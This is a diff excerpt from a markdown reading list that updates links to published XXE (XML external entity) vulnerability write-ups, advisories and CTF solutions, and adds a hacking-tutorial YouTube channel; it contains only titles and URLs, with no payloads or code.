* [XXE ALL THE THINGS!!! (including Apple iOS's Office Viewer)](http://en.hackdig.com/08/28075.htm)
|
||||||
* [Understanding Xxe From Basic To Blind - 10/11/2018 - Utkarsh Agrawal](http://agrawalsmart7.com/2018/11/10/Understanding-XXE-from-Basic-to-Blind.html)
|
|
||||||
* [From blind XXE to root-level file read access - December 12, 2018 by Pieter Hiele](https://www.honoki.net/2018/12/from-blind-xxe-to-root-level-file-read-access/)
|
* [From blind XXE to root-level file read access - December 12, 2018 by Pieter Hiele](https://www.honoki.net/2018/12/from-blind-xxe-to-root-level-file-read-access/)
|
||||||
* [How we got read access on Google’s production servers](https://blog.detectify.com/2014/04/11/how-we-got-read-access-on-googles-production-servers/) by detectify
|
* [How we got read access on Google’s production servers](https://blog.detectify.com/2014/04/11/how-we-got-read-access-on-googles-production-servers/) April 11, 2014 by detectify
|
||||||
* [Blind OOB XXE At UBER 26+ Domains Hacked](http://nerdint.blogspot.hk/2016/08/blind-oob-xxe-at-uber-26-domains-hacked.html) by Raghav Bisht
|
* [Blind OOB XXE At UBER 26+ Domains Hacked](http://nerdint.blogspot.hk/2016/08/blind-oob-xxe-at-uber-26-domains-hacked.html) August 05, 2016 by Raghav Bisht
|
||||||
* [XXE through SAML](https://seanmelia.files.wordpress.com/2016/01/out-of-band-xml-external-entity-injection-via-saml-redacted.pdf)
|
* [OOB XXE through SAML](https://seanmelia.files.wordpress.com/2016/01/out-of-band-xml-external-entity-injection-via-saml-redacted.pdf) by Sean Melia @seanmeals
|
||||||
* [XXE in Uber to read local files](https://httpsonly.blogspot.hk/2017/01/0day-writeup-xxe-in-ubercom.html)
|
* [XXE in Uber to read local files](https://httpsonly.blogspot.hk/2017/01/0day-writeup-xxe-in-ubercom.html) 01/2017
|
||||||
* [XXE by SVG in community.lithium.com](http://esoln.net/Research/2017/03/30/xxe-in-lithium-community-platform/)
|
* [XXE inside SVG](https://quanyang.github.io/x-ctf-finals-2016-john-slick-web-25/) JUNE 22, 2016 by YEO QUAN YANG
|
||||||
* [XXE inside SVG](https://quanyang.github.io/x-ctf-finals-2016-john-slick-web-25/)
|
|
||||||
* [Pentest XXE - @phonexicum](https://phonexicum.github.io/infosec/xxe.html)
|
* [Pentest XXE - @phonexicum](https://phonexicum.github.io/infosec/xxe.html)
|
||||||
* [Exploiting XXE with local DTD files - Arseniy Sharoglazov - 12/12/2018](https://mohemiv.com/all/exploiting-xxe-with-local-dtd-files/)
|
* [Exploiting XXE with local DTD files](https://mohemiv.com/all/exploiting-xxe-with-local-dtd-files/) - 12/12/2018 - Arseniy Sharoglazov
|
||||||
* [Web Security Academy >> XML external entity (XXE) injection - 2019 PortSwigger Ltd](https://portswigger.net/web-security/xxe)
|
* [Web Security Academy >> XML external entity (XXE) injection - 2019 PortSwigger Ltd](https://portswigger.net/web-security/xxe)
|
||||||
- [Automating local DTD discovery for XXE exploitation - July 16 2019 by Philippe Arteau](https://www.gosecure.net/blog/2019/07/16/automating-local-dtd-discovery-for-xxe-exploitation)
|
* [Automating local DTD discovery for XXE exploitation](https://www.gosecure.net/blog/2019/07/16/automating-local-dtd-discovery-for-xxe-exploitation) - July 16 2019 by Philippe Arteau
|
||||||
- [EXPLOITING XXE WITH EXCEL - NOV 12 2018 - MARC WICKENDEN](https://www.4armed.com/blog/exploiting-xxe-with-excel/)
|
* [EXPLOITING XXE WITH EXCEL - NOV 12 2018 - MARC WICKENDEN](https://www.4armed.com/blog/exploiting-xxe-with-excel/)
|
||||||
- [Midnight Sun CTF 2019 Quals - Rubenscube](https://jbz.team/midnightsunctfquals2019/Rubenscube)
|
* [Midnight Sun CTF 2019 Quals - Rubenscube](https://jbz.team/midnightsunctfquals2019/Rubenscube)
|
||||||
|
* [SynAck - A Deep Dive into XXE Injection](https://www.synack.com/blog/a-deep-dive-into-xxe-injection/) - 22 July 2019 - Trenton Gordon
|
||||||
|
* [SynAcktiv - CVE-2019-8986: SOAP XXE in TIBCO JasperReports Server](https://www.synacktiv.com/ressources/advisories/TIBCO_JasperReports_Server_XXE.pdf) - 11-03-2019 - Juien SZLAMOWICZ, Sebastien DUDEK
|
||||||
|
|
|
@ -9,6 +9,7 @@
|
||||||
- [Murmus CTF - Weekly live streamings](https://www.youtube.com/channel/UCUB9vOGEUpw7IKJRoR4PK-A)
|
- [Murmus CTF - Weekly live streamings](https://www.youtube.com/channel/UCUB9vOGEUpw7IKJRoR4PK-A)
|
||||||
- [PwnFunction](https://www.youtube.com/channel/UCW6MNdOsqv2E9AjQkv9we7A)
|
- [PwnFunction](https://www.youtube.com/channel/UCW6MNdOsqv2E9AjQkv9we7A)
|
||||||
- [OJ Reeves](https://www.youtube.com/channel/UCz2aqRQWMhJ4wcJq3XneqRg)
|
- [OJ Reeves](https://www.youtube.com/channel/UCz2aqRQWMhJ4wcJq3XneqRg)
|
||||||
|
- [Hacksplained - A Beginner Friendly Guide to Hacking](https://www.youtube.com/c/hacksplained)
|
||||||
|
|
||||||
## Conferences
|
## Conferences
|
||||||
|
|
||||||
|
|